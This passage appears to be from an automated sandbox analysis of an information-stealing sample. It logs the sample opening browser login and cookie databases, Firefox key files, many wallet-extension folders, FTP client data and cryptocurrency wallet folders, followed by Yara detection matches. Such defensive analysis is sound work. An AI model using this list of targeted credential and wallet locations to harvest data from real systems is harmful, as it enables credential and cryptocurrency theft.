Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000020.00000002.3341551842.0000000001388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2d569de7b1.exe PID: 7448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000000.2977404002.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3145991383.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.3221111651.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3155884712.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3081987586.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3235939586.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2993490502.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2992177721.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3237002232.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs